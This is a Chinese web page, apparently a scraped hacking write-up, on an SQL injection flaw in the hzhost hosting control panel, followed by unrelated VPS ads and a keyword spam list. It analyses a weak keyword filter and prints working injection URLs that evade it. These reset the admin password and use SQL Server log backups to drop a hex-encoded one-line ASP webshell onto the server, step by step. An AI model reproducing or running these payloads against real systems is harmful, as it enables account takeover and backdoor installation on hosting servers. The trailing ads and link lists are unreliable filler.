语句hzhost虚拟主机破绽[精彩]

hzhost  时间:2021-01-25  阅读:()

hzhost虚拟主机漏洞

漏洞存在于\hzhost\hzhost_master\control\ot2_mng\ot2_lst.asp文件中

先来分析该文件

-------------------------13-15行

querytype=SafeRequest("querytype") //saferequest函数接受数据if chk_int(querytype)=false then //检查是否是整数

ErrMsg="<font color=#ff0000>对不起</font>非法操作 . . . "-------------------------37-42行

---------------------------elseif querytype=5 then //如果类型为5。就接受qu1数据qu1=trim(SafeRequest("qu1") ) //saferequest函数接受数据他自己定义的saferequest函数if qu1="" then //不能为空call errorpage(-2, "对不起请选择参数 ")end ifqstring=" and s_regstt="&qu1&" " //这里是关键 qu1没有用单引号包围

-------------------------62-65行

---------------------------qu7=trim(SafeRequest("qu7") ) //saferequest函数接受数据if qu7<>"" thenqstring2=" and u_nme=' "&qu7&"' " //这里被单引号包围了。 这里被包围了所以这里成了死点 

end if

--------------------------117行

-----------------------------query="select * from v_ot2lst where

(s_unme=' "&session("usrname")&"' or u_fatstr like

'%, "&session("usrname")&",%' ) "&qstring&qstring2&"order by "&orderstring

//这里就放入了语句开始查询!了

我们来看看saferequest究竟是怎么写的。

------------------incs/config.asp中

-------------------------

Function SafeRequest(ParaName)

Dim ParaValue

ParaValue=Request(ParaName) //获取数据if IsNumeric(ParaValue) then //如果是数字

SafeRequest=ParaValue //那就不过滤直接赋值exit Functionelse

ParaValuetemp=lcase(ParaValue) //如果不是数字先把接到的数据全部转为小写tempvalue="select | insert |delete from| ' |count( |droptable|update |truncate |asc( |mid( |char( |xp_cmdshell |execmaster|net localgroup administrators|net user| or | and|%20from"

//定义要过滤的字符他过滤方式有问题。 。 。没有过滤*%--temps=split(tempvalue, "|") //转为一维数组for mycount=0 to ubound(temps) //循环读数据

if Instr(ParaValuetemp, temps(mycount) ) > 0 then //判断用户提交的数据是否包含了非法字符。call errorpage(-2, "非法请求   ") //如果有则弹出提示 response.endend ifnext

SafeRequest=ParaValueend if

End function

-------------------------------------

来说说我的思路 由于上面过滤了单引号所以导致被单引号包围了的变量都隔绝了注入漏洞 我们只有找到没有被单引号包围的变量才能突破过滤 因为mssql太人性化了。 。 。哈哈 

根据ot2_lst.asp中117行的查询语句我构造了如下语句querytype=5&qu7=1&ordernum=32&qu1=1 ; {我们的语

句} ;select%09*%09from%09v_ot2lst where s_regstt=1

这里是多句执行执行了3句。 。我们可以放入更多的语句一次执行就看个人的爱好了。  

放到数据库中就成了select * from v_ot2lst where (s_unme='username' or u_fatstrlike '%,username,%' ) and s_regstt={我们的语句}//这里没有单引号。 and u_nme=' 1'//这里有 order by s_addtme desc

我们的语句构造原则不能出现单引号。空格用%09代替

示范语句

UPDATE%09[memlst]%09SET%09u_pss=0x6531306164633339343962613

539616262653536653035376632306638383365 WHEREu_nme=0x61646D696E

//看仔细 saferequest过滤的是update空格

我们这里是update%09,就逃过了过滤。 u_pss经过编码了。编码方式为varchar

这条语句就是把用户admin的密码修改为123456

下面我们来进行实战

首先注册一个用户。登陆上去。访问http://www.xxxxx.com/control/ot2_mng/ot2_lst.asp?querytype=5&qu7=1&ordernum=32&qu1=1 ;declare @a sysname,@svarchar%09(4000)%09select%09@a=db_name() ,@s=0x443A5C687A686F73745C687A686F73745F6D61737465725C312E617370 backup log @ato disk=@s;select%09*%09from%09v_ot2lst where s_regstt=1这样就直接把管理员的密码修改为123456了。

为了避免破坏我还是修改自己的密码。我刚才的密码为123123我们改为123456

我们刷新一下看看。因为刷新后他又检查了我的用户名和密码。由于不一致所以提示再次登陆

OK了。 。 我下面来演示备份挂马tempvalue="select | insert |delete from| ' |count( |droptable|update |truncate |asc( |mid( |char( |xp_cmdshell |execmaster|net localgroup administrators|net user| or | and|%20from"

备份木马语句create table [dbo] . [banlg] ([cmd] [image] )--

第一句没有出现非法字符直接放上去

declare @a sysname,@svarchar%09(4000)%09select%09@a=db_name() ,@s=0x7969616F6C75backup log @a to disk=@s with init--

过滤了select 《〈 〈 〈注意有个空格。我们就用%09代替就逃过了char(也是被过滤的。我们在空间弄个空格 mssql还是会认识的。哈哈我爱他。

我已经拿到系统权限了。刚才删除的1.asp是前面弄的。我先删了。insert%09into%09banlg(cmd)values(0x3C25657865637574652872657175657374282261222929253E) ;--

我说我怎么成管理员了呢。 。是先前弄的 session还没消失declare @a sysname,@svarchar%09(4000)%09select%09@a=db_name() ,@s=0x443A5C687A686F73745C687A686F73745F6D61737465725C312E617370 backup log @ato disk=@s--

忘记了。

我们刚才看到了 1.asp又被挂了上去。访问看看。

无语肯定又是被截断了。 。

再来搞一遍。

Drop table [banlg]--

第一步:create table [dbo] . [shit_tmp] ([cmd] [image] )--

第二步

declare @a sysname,@snvarchar%09(4000)%09select%09@a=db_name() ,@s=0x7900690061006F006C007500 backup log@a to disk=@s with init,no_truncate--第三步insert%09into%09[shit_tmp] (cmd)values(0x3C25657865637574652872657175657374282261222929253E)--

第四步declare @a sysname,@snvarchar%09(4000)%09select%09@a=db_name() ,@s=0x44003A005C0068007A0068006F00730074005C0068007A0068006F00730074005F006D00610073007400650072005C0031002E00610073007000 backup log @ato disk=@s--

第五步

Drop table [shit_tmp]--

我们已经看到一句话木马躺在那里了呵呵。

好了怎么拿系统权限后面该如何下去。请看我前几天爆的那个漏洞。 以及利用方法。

动画到此结束谢谢观赏 http://www.xxb ing.com

QQ178737315

HostYun 新上美国CN2 GIA VPS 月15元

HostYun 商家以前是玩具主机商,这两年好像发展还挺迅速的,有点在要做点事情的味道。在前面也有多次介绍到HostYun商家新增的多款机房方案,价格相对还是比较便宜的。到目前为止,我们可以看到商家提供的VPS主机包括KVM和XEN架构,数据中心可选日本、韩国、香港和美国的多个地区机房,电信双程CN2 GIA线路,香港和日本机房,均为国内直连线路。近期,HostYun上线低价版美国CN2 GIA ...

Sharktech10Gbps带宽,不限制流量,自带5个IPv4,100G防御

Sharktech荷兰10G带宽的独立服务器月付319美元起,10Gbps共享带宽,不限制流量,自带5个IPv4,免费60Gbps的 DDoS防御,可加到100G防御。CPU内存HDD价格购买地址E3-1270v216G2T$319/月链接E3-1270v516G2T$329/月链接2*E5-2670v232G2T$389/月链接2*E5-2678v364G2T$409/月链接这里我们需要注意,默...

Hostodo美国独立日优惠套餐年付13.99美元起,拉斯维加斯/迈阿密机房

Hostodo又发布了几款针对7月4日美国独立日的优惠套餐(Independence Day Super Sale),均为年付,基于KVM架构,采用NVMe硬盘,最低13.99美元起,可选拉斯维加斯或者迈阿密机房。这是一家成立于2014年的国外VPS主机商,主打低价VPS套餐且年付为主,基于OpenVZ和KVM架构,产品性能一般,支持使用PayPal或者支付宝等付款方式。商家客服响应也比较一般,推...

hzhost为你推荐
骁龙750g和765g哪个好765g和855+比有什么优缺点?涡轮增压和自然吸气哪个好涡轮增压和自然吸气哪个好轿车和suv哪个好轿车和SUV 的驾驶视野,那个比较好!!机械表和石英表哪个好自动石英表与全自动机械表哪个好等额本息等额本金哪个好等额本息和等额本金哪个好?等额本息等额本金哪个好等额本金和等额本息的区别哪个好核芯显卡与独立显卡哪个好独立显卡和核心显卡哪个好核芯显卡与独立显卡哪个好核心显卡和独立显卡哪个好手机炒股软件哪个好手机炒股软件网校哪个好初中网校哪个好?
中文域名申请 阿里云邮箱登陆首页 php主机 好看的桌面背景大图 标准机柜尺寸 中国特价网 权嘉云 带宽租赁 注册阿里云邮箱 域名和主机 nnt 贵州电信 wannacry勒索病毒 卡巴斯基免费版下载 热云 dmz主机 国外bt网站 56折扣网 正在登陆游戏服务器 联通3g无限流量卡 更多